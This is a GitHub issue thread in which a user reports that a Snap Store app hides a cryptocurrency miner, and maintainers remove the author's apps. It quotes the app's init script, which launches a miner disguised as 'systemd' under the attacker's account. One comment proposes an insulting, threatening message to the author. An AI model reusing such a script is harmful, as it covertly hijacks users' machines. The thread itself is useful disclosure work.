Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How to ask to ban the application for security reasons? #651

Closed
tarwirdur opened this issue May 11, 2018 · 13 comments
Closed

How to ask to ban the application for security reasons? #651

tarwirdur opened this issue May 11, 2018 · 13 comments
Assignees

Comments

@tarwirdur
Copy link

@tarwirdur tarwirdur commented May 11, 2018

This application contains hidden сrypto-currency miner inside.

  • squashfs-root/systemd - miner
  • squashfs-root/start - init script:
#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

I did not find way to complain about the application. Which way is good for it?

@mathe30
Copy link

@mathe30 mathe30 commented May 12, 2018

send him a message on the email that says :

Loading

@mathe30
Copy link

@mathe30 mathe30 commented May 12, 2018

I know your lil dirty secrity , remove the application or I am gonna send this on public and will let your mum know that you are cheap bitch

Loading

@sparkiegeek sparkiegeek self-assigned this May 12, 2018
@sparkiegeek
Copy link
Collaborator

@sparkiegeek sparkiegeek commented May 12, 2018

Thanks for the report, we're removing these from the store whilst we investigate

Loading

@tarwirdur
Copy link
Author

@tarwirdur tarwirdur commented May 12, 2018

@sparkiegeek, note that other application from this author contains miner too. (I've checked only for 2048buntu and hextris, but suppose that other contains it too).

UPD: already deleted. Thank you.

Loading

@sparkiegeek
Copy link
Collaborator

@sparkiegeek sparkiegeek commented May 12, 2018

@tarwirdur yes, we've removed all applications from this author pending further investigations.

Thank you for your vigilance!

Loading

@Enerccio
Copy link

@Enerccio Enerccio commented May 13, 2018

aww let the poor guy get his ferrari...

Loading

@tdemin
Copy link

@tdemin tdemin commented May 13, 2018

@Enerccio what's the point in being poor and getting a Ferrari?

Loading

@oliwarner
Copy link

@oliwarner oliwarner commented May 13, 2018

Any plans to push a fake package update that forcibly uninstalls this crap?

Loading

@Ads20000
Copy link

@Ads20000 Ads20000 commented May 13, 2018

For future reference the store category on the snapcraft forum is probably the best place to ask for a store removal. Pretty much all the snappy developers watch that forum pretty regularly so you'd possibly get an even swifter response than the one you got here.

Also I've started a topic there asking what action will be taken to make this less likely to happen in the future.

Loading

@rliden
Copy link

@rliden rliden commented Jul 25, 2019

The app is still up in the OP post. Why?

Loading

@tarwirdur
Copy link
Author

@tarwirdur tarwirdur commented Aug 5, 2019

The app is still up in the OP post. Why?

@rliden this app was cured and replaced with cured version.
On victim's computers it should be automatically updated to cured version.

Now you can see 'Snap Quarantine (snap-quarantine)` as the application author.

Loading

@ghost
Copy link

@ghost ghost commented Aug 10, 2019

GNU Image Manipulations Program (GIMP) by Snapcrafters which is another application with this virus is still up on the Ubuntu Store so be careful you install the other GIMP you find. They're trick is to prevent people from commenting or rating on the Ubuntu Store which prevents people from knowing it is a virus.

Loading

@Ads20000
Copy link

@Ads20000 Ads20000 commented Aug 27, 2019

@UltraFractal can you substantiate your claim? I find it very unlikely that GIMP by https://github.com/snapcrafters has this crypto miner. For the snapcrafters GitHub repo and the snapcrafters store account, as far as I'm aware, it's Canonical employees who have write access, so Canonical itself would be culpable if your claim is correct. If you can prove that GIMP by snapcrafters has this crypto miner then please provide your evidence.

Loading

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
8 participants